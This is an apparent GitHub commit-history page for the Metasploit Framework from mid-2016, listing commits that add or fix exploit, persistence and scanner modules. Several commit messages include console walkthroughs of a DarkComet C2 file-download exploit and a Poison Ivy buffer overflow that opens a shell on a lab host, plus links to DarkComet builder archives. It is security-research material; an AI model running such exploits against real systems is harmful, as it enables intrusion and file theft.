Commit Graph

20752 Commits (c13ab28a5bc6eb4813f46960781a4e2e746d708d)

Author SHA1 Message Date
Tod Beardsley 7a36d03fe3
Trying multi arch 2016-06-23 12:34:51 -05:00
Scott Lee Davis 47674c77ad chmod 644 swagger_param_inject.rb 2016-06-23 11:49:16 -04:00
Scott Lee Davis fbd0bc4308 updated as per @egypt & @todb-r7 recommendations. 2016-06-23 11:41:54 -04:00
khr0x40sh 40d7de05ef Fix Payload Generation
Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
2016-06-23 11:20:22 -04:00
Tod Beardsley fc79f3a2a9
Modify for only NodeJS
Not sure if we can do multiple arch's in the same module. Doesn't look
like it's possible today.

See rapid7#7015
2016-06-23 10:14:57 -05:00
Scott Davis 579a3bcf7c default payload is NOT text based, so do nothing with it. 2016-06-23 07:00:14 -07:00
Scott Davis 47e4321424 CVE-2016-5641 2016-06-23 06:09:37 -07:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 048741660c
Land #6980, Add ClamAV Remote Command Transmitter 2016-06-22 15:50:45 -05:00
David Maloney 3e94abe555
put net:ssh::commandstream back
this was apparently our own creation for doing
ssh sessions

MD-1688
2016-06-22 15:02:36 -05:00
David Maloney 6072697126
continued 2016-06-22 14:54:00 -05:00
David Maloney 140621ad9b
start to move to canonical net-ssh
removed vendored net::ssh
pulled in net:ssh gem
made Rex::Socket::SSHFactory clas to bridge rex sockets in
Renamed getpeername to getpeername-as_array to not override
core socket behaviour

MS-1688
2016-06-22 14:52:33 -05:00
wchen-r7 de5152401a
Land #6992, Add tiki calendar exec exploit 2016-06-22 11:18:14 -05:00
wchen-r7 8697d3d6fb Update tiki_calendar_exec module and documentation 2016-06-22 11:17:45 -05:00
James Lee 07f7e5e148
Convert non-loginscanner MSSQL to rubyntlm 2016-06-22 10:15:22 -05:00
khr0x40sh df1a9bee13 Move ps1, Use Env var, Fix license, New Cleanup
MS16-032 ps1 moved to external file.  This ps1 will now detect windir
to find cmd.exe.  The module now also detects windir to find
powershell.exe.  The license is now BSD_LICENSE, and the required
copyright has been moved to the ps1. The previous optional cleanup stage
 is now standard.  The optional 'W_PATH' assignment is corrected to
select the user's variable unless 'W_PATH' is nil.
2016-06-22 09:25:48 -04:00
h00die 0f2c1d886c append over read and write 2016-06-21 16:56:34 -04:00
h00die 42697b46ac append over read and write 2016-06-21 16:52:40 -04:00
h00die 9cb57d78d7 updated check and docs that 14.2 may not be vuln 2016-06-21 16:48:09 -04:00
Meatballs 81f30ca962
Land #6966, Microsoft Office Trusted Locations Enumeration 2016-06-21 21:45:39 +01:00
khr0x40sh b9d0bcc193 Add MS16-032 Local Priv Esc Exploit to tree
This module will use the powershell port of ms16-032 created by
@FuzzySec.  All payloads are pushed to a compress powershell script in a
plain text file on the disk to execute.
2016-06-21 14:56:12 -04:00
h00die c7bacebd5b slight issues found by void-in 2016-06-21 05:12:10 -04:00
h00die 4b8f572976 cron persistence 2016-06-20 21:45:04 -04:00
h00die c50f935412 shell > cmd all day 2016-06-20 17:59:01 -04:00
h00die 15a3d739c0 fix per wchen 2016-06-20 17:57:10 -04:00
William Webb 3f9d0630ce Merge remote-tracking branch 'upstream/pr/6955' into land-6955 2016-06-20 13:14:37 -05:00
William Webb e692e32dae
Land #6955, DarkComet C2 Arbitrary File Download Exploit 2016-06-20 12:03:38 -05:00
William Webb c816af1e4d Merge remote-tracking branch 'upstream/pr/6955' into land-6955 2016-06-20 12:00:19 -05:00
wchen-r7 2b85b210e9 Fix #6984, Undefined method 'winver' in ms10_092_schelevator
Fix #6984
2016-06-20 10:37:41 -05:00
Pearce Barry 95517b4a45 Avoid exception on missing key in prefs. 2016-06-20 09:26:10 -05:00
William Vu 6cb2a6970e Fix unused SessionType in two modules
Pretty sure it should be "shell."
2016-06-19 23:41:34 -05:00
h00die 6905a29b10 sshkey persistence 2016-06-19 22:40:03 -04:00
HD Moore 856a4c7684 Reference BadTunnel (appropriate for the nat module) 2016-06-19 20:50:12 -05:00
h00die 6fe7698b13 follow redirect automatically 2016-06-19 20:24:54 -04:00
HD Moore a84614f2c0 Whitespace only 2016-06-19 18:44:32 -05:00
HD Moore ce7c6496dd Rework to clarify that this a brute force spoof, unrelated to BadTunnel 2016-06-19 13:36:39 -05:00
h00die 3f25c27e34 2 void-in fixes of 3 2016-06-19 14:35:27 -04:00
h00die ddfd015310 functionalized calendar call, updated docs 2016-06-19 08:53:22 -04:00
HD Moore 6507e520c7 Cleanups, addition of a 'direct' module 2016-06-18 15:37:54 -05:00
HD Moore d8f6be0a3f Silly typo [cosmetic] 2016-06-18 14:34:49 -05:00
h00die 3feff7533b tiki calendar 2016-06-18 13:11:11 -04:00
HD Moore b4af7eb039 Remove useless include 2016-06-18 01:31:55 -05:00
HD Moore 3aff0050ee Whitespace 2016-06-18 01:24:45 -05:00
HD Moore 01a951d5aa Add references & credit 2016-06-18 01:23:49 -05:00
samvartaka 5405b0f3db clarified attack failure error message 2016-06-18 04:31:58 +02:00
Brendan Watters c02a05f913 Removed code that was already commented out 2016-06-17 15:47:15 -05:00
Brendan Watters 1225a93179 Moved ClamAV scanner to scanning module
s
2016-06-17 15:40:33 -05:00
Brendan Watters c130495968 Updated logging, but still probably wrong. 2016-06-17 13:31:24 -05:00
Brendan Watters 813777a8e4 Cleaned up the code a little after trying to fix ip printing issues. 2016-06-17 13:09:03 -05:00
Brendan Watters fee54b4a5a Changed the module to support scanning 2016-06-17 13:03:28 -05:00
HD Moore 0af2fa7164 Add a module for the 'BadTunnel' vulnerability 2016-06-17 03:06:04 -05:00
h00die ebde552982 gem version 2016-06-16 21:09:56 -04:00
Brendan Watters 9ea0b8f944
Land #6934, Adds exploit for op5 configuration command execution 2016-06-16 14:36:10 -05:00
William Vu ea988eaa72 Add setsid to persist the shell
Prevents the watchdog from killing our session.
2016-06-16 11:31:35 -05:00
Brendan Watters 050b604e77 Fixed the syntax error 2016-06-15 21:45:52 -05:00
Brendan Watters 0e5c5559cf Updated documentation and printing per suggestions 2016-06-15 21:32:53 -05:00
h00die cfb034fa95 fixes all previously identified issues 2016-06-15 20:58:04 -04:00
h00die baa603b637 wvu-r7 rex sleep suggestions 2016-06-15 20:41:25 -04:00
Brendan Watters 74103f3760 Cleaned up ruby 2016-06-15 17:56:05 -05:00
wchen-r7 c6b1955a5a
Land #6729, Speed up the datastore 2016-06-15 17:55:42 -05:00
Brendan Watters 312175eed3 Add ClamAV Remote Command Transmitter 2016-06-15 17:34:08 -05:00
Meatballs 0451d4f079
Cleanup 2016-06-15 22:41:59 +01:00
Rob Fuller bca88d8443
Landing #6961 Regsvr32 SCT App Whitelist Bypass Server
by @kn0

rts
2016-06-15 15:28:02 -04:00
h00die 81fa068ef0 pulling out the get params 2016-06-15 12:27:31 -04:00
William Webb 24eba6b831
Land #6956, Check presence in local admin group 2016-06-15 10:37:17 -05:00
Vincent Yiu 8a68e86a0a Update enum_trusted_locations.rb
Changed some colours
2016-06-15 13:42:38 +01:00
Vincent Yiu 48714184f3 Update enum_trusted_locations.rb
Added product it found the locations in.
2016-06-15 13:41:19 +01:00
h00die 52db99bfae vars_post for post request 2016-06-15 07:24:41 -04:00
h00die 625d60b52a fix the other normalize_uri 2016-06-14 15:03:07 -04:00
h00die afc942c680 fix travis 2016-06-13 19:07:14 -04:00
h00die bd4dacdbc3 added Rank 2016-06-13 19:04:06 -04:00
h00die 72ed478b59 added exploit rank 2016-06-13 18:56:33 -04:00
h00die 40f7fd46f9 changes outlined by wvu-r7 2016-06-13 18:52:25 -04:00
William Webb 563b8206c5
Land #6962, Apache Continuum Exploit 2016-06-13 16:41:53 -05:00
Trenton Ivey 3a39d8020d Moving back to PSH option only 2016-06-13 12:44:21 -05:00
Trenton Ivey 52bbd22a81 Moving back to PSH option only 2016-06-13 12:10:48 -05:00
samvartaka 4de337e6d9 Ran rubocop on the module as per @espreto's suggestion, cleaned up several style issues 2016-06-12 17:20:57 +02:00
Vincent Yiu 1ba33ff7f8 Fixed MSFTidy
Fixed MSFTidy stuff
2016-06-12 13:00:44 +01:00
Vincent Yiu a2a97d0271 Update enum_trusted_locations.rb
Fix some changes, I had emet references.
2016-06-12 11:06:20 +01:00
Vincent Yiu 2e03c3511e Add enum_trusted_locations.rb
Quickly enumerates trusted locations for file planting :)
2016-06-12 10:59:57 +01:00
h00die f63273b172 email change 2016-06-11 21:05:34 -04:00
h00die bd6eecf7b0 centreon useralias first add 2016-06-11 20:57:18 -04:00
Trenton Ivey 8c7796c6d3 Module Cleanup 2016-06-11 18:12:42 -05:00
Trenton Ivey 46eff4c96d Added command option 2016-06-11 18:07:24 -05:00
William Vu ec1248d7af Convert to CmdStager 2016-06-10 20:42:01 -05:00
Trenton Ivey 6af3c4ab99 Added zero to Run method to prevent popup 2016-06-10 14:52:02 -05:00
William Vu 46239d5b0d Add Apache Continuum exploit 2016-06-09 22:35:38 -05:00
Trenton Ivey 17974d74e2 Removing space at end of line 2016-06-09 21:49:24 -05:00
Trenton Ivey 6cd1da414f Regsvr32.exe Application Whitelist Bypass Server 2016-06-09 21:15:07 -05:00
h00die d63dc5845e wvu-r7 comment fixes 2016-06-09 21:52:21 -04:00
h00die 16b4829d57 fixed socket.get issue 2016-06-09 21:36:21 -04:00
h00die 63db330a02 rubocop fixes, msftidy fixes 2016-06-09 21:03:57 -04:00
h00die 027f538300 original from EDB 2016-06-09 20:35:00 -04:00
earthquake c0093381d7 Big endian ARM Linux bind shellcode for ipv4 2016-06-10 00:06:53 +02:00
Brent Cook b0bf901b22
Land #6950, avoid printing rhost:rport twice when using Msf::Exploit::Remote::SMB::Client 2016-06-09 16:35:09 -05:00
Brent Cook 199ae04b57 fix more duplicate port/ip things 2016-06-09 16:26:41 -05:00
Brent Cook ba40d0e06f
handle the lpath not being specified 2016-06-09 16:22:47 -05:00
William Vu 6da8c22171 Rename hash method to crypt
To avoid a conflict with Object#hash in Pro.

MS-1636
2016-06-09 15:21:40 -05:00
wchen-r7 7143095b4b
Land #6947, add auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum 2016-06-09 14:21:55 -05:00
earthquake a58a3d4330 one line aligned to the others, space replaced to tab 2016-06-09 20:53:12 +02:00
earthquake 5f4153308c one line aligned to the others, space replaced to tabx 2016-06-09 20:52:20 +02:00
wchen-r7 207d92a125 Use scan to do regex capture 2016-06-09 11:07:00 -05:00
wchen-r7 1b4a6a7981 Use the UDP mixin to it can cleanup properly 2016-06-09 11:04:50 -05:00
Crypt0-M3lon 233186c833 Check presence in local admin group
As the "is_admin?" function only checks if the current session effectively has admin rights, I offer to add a check to know if the current user is in the local admin group using the "is_in_admin_group?" function. This information is better suited to check if admin rights are obtainable using the "bypassuac" module.
2016-06-09 17:47:09 +02:00
samvartaka ba6d00cee2 This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf) which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.

See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.

See https://mega.nz/#!wlZkSJLK!NI_Z-9UoPBQ0MDEYXLVr1wUJyVV70qVprWqSUol_53k
for the DarkComet 5.3.1 C2 server / builder

See https://mega.nz/#!AxRmkQLb!MVjwua3qrzgyXq7vUWSxISwVE7vQ8rEJbexieb8s0Ro
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')

## Console output

Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).

### Version 5.3.1 (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```

### Version 4.2F (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-09 14:42:25 +02:00
ssyy201506 d470371694 fix the available size of payload for exploit/windows/local/payload_injection 2016-06-09 13:40:25 +09:00
wchen-r7 7cdadca79b
Land #6945, Add struts_dmi_rest_exec exploit 2016-06-08 23:16:46 -05:00
h00die 6f5edb08fe pull uri from datastore consistently 2016-06-08 20:28:36 -04:00
William Vu 37efff59ce
Land #6949, hash fix for filezilla_client_cred 2016-06-08 15:21:03 -05:00
wchen-r7 f0bb125556 Should be print_error 2016-06-08 14:22:36 -05:00
William Vu 600704c053 Merge remote-tracking branch 'upstream/pr/6939' 2016-06-08 14:22:33 -05:00
wchen-r7 52bcade72c Fix #6948, Modules using the SMB client are printing peer twice
Fix #6948
2016-06-08 12:16:50 -05:00
wwebb-r7 ab27c1b701 Merge pull request #6940 from samvartaka/master
Exploit for previously unknown stack buffer overflow in Poison Ivy versions 2.1.x (possibly present in older versions too)
2016-06-08 11:25:51 -05:00
Adam Compton 158176aa05 replaced "if !" on line 41 with "unless"
replaced "$1" on line 51 with "Regexp.last_match(1)
restructed the print statement on line 56 to more closely match suggestion
removed "self." from line 71
changed line 78 to loop for 2 seconds insetead of 1 second
2016-06-08 09:28:08 -04:00
Crypt0-M3lon eaaa9177d5 Fix "username" key to add login in creds database 2016-06-08 10:38:38 +02:00
wchen-r7 f13d91f685 Fix a prob of printing an empty rhost from the scanner mixin 2016-06-07 19:19:39 -05:00
wchen-r7 e8304e684c
Bring #6793 up to date with upstream-master 2016-06-07 19:04:32 -05:00
wchen-r7 6ae4d1576e Apply fixes to symantec_brightmail_ldapcreds.rb 2016-06-07 19:01:58 -05:00
samvartaka 5260031991 Modifications based on suggestions by @wchen-r7 2016-06-08 01:17:15 +02:00
Adam Compton 75a34c4aca added a new aux module to quickly scan for Jenkins servers on the local broadcast network by sending out a udp packet to port 33848 on the broadcast address. Any Jenkins server should respond with XML data containing the Jenkins server version. 2016-06-07 16:57:06 -04:00
dmohanty-r7 9450906ca4
Correctly set Dummy param 2016-06-07 14:42:51 -05:00
dmohanty-r7 f47128ccdd
Cleanup canon_irav_pwd_extract module 2016-06-07 14:31:37 -05:00
Brendan Watters c4aa99fdac
Land #6925, ipfire proxy exec 2016-06-07 10:24:59 -05:00
Brendan Watters 7e84c808b2 Merge remote-tracking branch 'upstream/pr/6924' into dev 2016-06-07 09:24:25 -05:00
wchen-r7 b59d10d9c4
Land #6929, Add HP Data Protector Encrypted Comms exploit 2016-06-06 22:45:53 -05:00
wchen-r7 60c60bf004 Minor cosmetic changes 2016-06-06 22:45:00 -05:00
Vex Woo e4c55f97db Fix module desc 2016-06-06 10:40:36 -05:00
Vex Woo 9f19d2c210 add apache struts2 S2-033 rce module 2016-06-06 05:07:48 -05:00
amarionette 4354b5d5d6 Changed class from Metasploit3 to MetasploitModule 2016-06-03 17:43:41 -07:00
amarionette 99790e343d Removed debug statement 2016-06-03 17:36:00 -07:00
h00die c2699ef194 rubocop fixes 2016-06-03 17:43:11 -04:00
h00die 2f837d5d60 fixed EDB spelling 2016-06-03 17:17:36 -04:00
h00die 8d76bdb8af fixed EDB reference 2016-06-03 17:13:36 -04:00
Brendan Watters d7cd10f586 Suggested updates for style and clarity 2016-06-03 14:04:58 -05:00
Brendan Watters 91658d2a61 Changes per rubocop and sinn3r 2016-06-03 12:42:38 -05:00
samvartaka 8ca571aee3 no message 2016-06-03 19:29:55 +02:00
samvartaka 0114d2cf0b This module exploits a publicly known vulnerability in the C2 server of DarkComet versions 3.2 and up
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.

See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.

## Console output

Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).

### Version 5.3.1 (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```

### Version 4.2F (unknown password)

```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options

Module options (auxiliary/gather/darkcomet_filedownloader):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   BRUTETIMEOUT  1                no        Timeout (in seconds) for bruteforce attempts
   KEY                            no        DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
   LHOST         0.0.0.0          yes       This is our IP (as it appears to the DarkComet C2 server)
   NEWVERSION    true             no        Set to true if DarkComet version >= 5.1, set to false if version < 5.1
   RHOST         0.0.0.0          yes       The target address
   RPORT         1604             yes       The target port
   STORE_LOOT    true             no        Store file in loot (will simply output file to console if set to false).
   TARGETFILE                     no        Target file to download (assumes password is set)

msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run

[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
2016-06-03 19:24:56 +02:00
samvartaka 290e1eb0fa This module exploits a previously unknown stack buffer overflow vulnerability
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).

See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.

## Console output

Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).

### Version 2.1.4

```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...

[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
2016-06-03 19:20:06 +02:00
Brent Cook 5420848c49
Land #6922, add popen() additional vector to ImageMagick exploit (imagemagick_delegate) 2016-06-03 08:06:07 -05:00
Brent Cook f034952852
Land #6918, Added additional SAP TCP/IP ports into the sap_port_info function. 2016-06-03 08:01:04 -05:00
Brent Cook d371fd0798
Land #6885, add aux control module for PhoenixContact PLCs 2016-06-03 07:50:39 -05:00
wchen-r7 f333481fb8 Add vendor patch info 2016-06-02 16:41:06 -05:00
wchen-r7 7c9227f70b Cosmetic changes for magento_unserialize to pass msftidy & guidelines 2016-06-02 16:34:41 -05:00
dmohanty-r7 a15c79347b
Add canon printer credential harvest module
Praedasploit
2016-06-02 16:07:28 -05:00
William Vu 9128ba3e57 Add popen() vuln to ImageMagick exploit
So... we've actually been sitting on this vuln for a while now. Now that
the cat's out of the bag [1], I'm updating the module. :)

Thanks to @hdm for his sharp eye. ;x

[1] http://permalink.gmane.org/gmane.comp.security.oss.general/19669
2016-06-02 11:35:37 -05:00
mr_me 4f42cc8c08 Added module 2016-06-02 09:24:10 -05:00
h00die 68d647edf1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into op5 2016-06-01 18:05:18 -04:00
h00die 52d5028548 op5 config exec 2016-06-01 15:07:31 -04:00
a-marionette 7f92088242 Revised the SQL query for the exploits/unix/webapps/joomla_content_history_sqli_rce.rb. The exploit is now working for me. 2016-06-01 09:47:32 -07:00
root d72492fe30 Add support for older Data Protector versions
Increases support by enabling all SSL ciphers. Some older versions
of DP only support weaker export ciphers not enabled by default.
2016-06-01 10:45:47 +01:00
sho-luv 98cfcc65ae Added IP address to returned information.
This scanner module doesn't tell you the location of the found information. So when using the -R option to fill the RHOSTS all you get is a bunch of successful findings, however you won't know to which systems they belong.
2016-05-31 19:47:00 -07:00
Ian Lovering eb2398a446 Renamed hp_dataprotector_encrypted_comms
Renamed to match other data protector exploits
2016-05-31 22:58:32 +01:00
Ian Lovering 54c4771626 Exploit for HP Data Protector Encrypted Comms
Added exploit for HP Data Protector when using encrypted communications.

This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
2016-05-31 22:44:14 +01:00
wchen-r7 fb678564b1
Land #6923, Check the correct check code for ms13_081_track_popup_menu 2016-05-31 11:40:02 -05:00
h00die 8ce59ae330 travis fixes 2016-05-31 05:46:20 -04:00
h00die 057947d7e8 ipfire proxy exec 2016-05-30 10:24:17 -04:00
h00die 9b5e3010ef doc/module cleanup 2016-05-30 06:33:48 -04:00
h00die df55f9a57c first add of ipfire shellshock 2016-05-29 20:40:12 -04:00
Tijl Deneut 2afcda9d49 Did some more rubocopy work and
added module documentation
2016-05-28 15:32:18 +02:00
wchen-r7 504a94bf76 Technically, this is form auth, not http auth 2016-05-27 18:39:25 -05:00
wchen-r7 14adcce8bf Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00
wchen-r7 61f9cc360b Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00
wchen-r7 7f643a7b8d Fix syntax error 2016-05-27 18:05:24 -05:00
wchen-r7 4dcddb2399 Fix #4885, Support basic and form auth at the same time
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.

Fix #4885
2016-05-27 16:25:42 -05:00
Bruno Morisson 01a691a46c Update sap_router_portscanner.rb
Added additional SAP TCP/IP ports for sap_port_info function.

ref: https://wiki.scn.sap.com/wiki/display/TCPIP/Services
2016-05-27 14:43:16 +01:00
wchen-r7 fb95abc645
Land #6909, Add WordPress Ninja Forms unauthenticated file upload 2016-05-25 15:40:10 -05:00
wchen-r7 14e1baf331 Minor style changes 2016-05-25 15:39:26 -05:00
rastating 19c4d5b02b Remove hard coded target path 2016-05-25 18:04:26 +01:00
William Webb 028b1ac251 Land #6816 Oracle Application Testing Suite File Upload 2016-05-24 18:27:10 -05:00
William Vu 3dfdf1d936
Land #6528, tilde expansion and more for OptPath 2016-05-24 16:01:59 -05:00
Jon Hart 48c25dd863
Remove need for expand_path in this module; normalize handles it now 2016-05-24 13:30:12 -07:00
Jon Hart 3df4c38e82
Use correct key file var 2016-05-24 13:28:08 -07:00
Brendan Watters 77a62ff7c0
Land #6905 RC4 Stagers 2016-05-24 09:34:32 -05:00
Brendan Watters af86d63498 Updated Cache size 2016-05-24 09:07:05 -05:00
Brendan Watters f0b945e4c4 Updated cache size 2016-05-24 09:06:46 -05:00
Brendan Watters d328258db4 Updated Cache size 2016-05-24 09:06:28 -05:00
Brent Cook 5c6b93c1cf
Land #6883, Add Ubiquiti airOS exploit 2016-05-24 07:26:40 -05:00
William Vu ca76e8f290 Update allwinner_backdoor report_vuln hash 2016-05-24 00:57:37 -05:00
Brent Cook 5bf8891c54
Land #6882, fix moodle_cmd_exec HTML parsing to use REX 2016-05-23 23:25:22 -05:00
Brent Cook 266d29ca4a handle garbage better during probe 2016-05-23 22:28:31 -05:00
Brent Cook a6020ca010 style fixes 2016-05-23 22:14:57 -05:00
Brent Cook 928a706135
Land #6890, Allwinner CPU kernel module local privilege escalation 2016-05-23 22:00:52 -05:00
Brent Cook 2f8562fba4 added documentation and minor style tweaks 2016-05-23 21:59:44 -05:00
rastating adb8098b8c Fix typo 2016-05-24 00:16:04 +01:00
rastating aae7c25603 Add WordPress Ninja Forms unauthenticated file upload module 2016-05-23 23:47:41 +01:00
h00die 4242bbdf55 change report_note to report_vuln per note 2016-05-23 17:36:50 -04:00
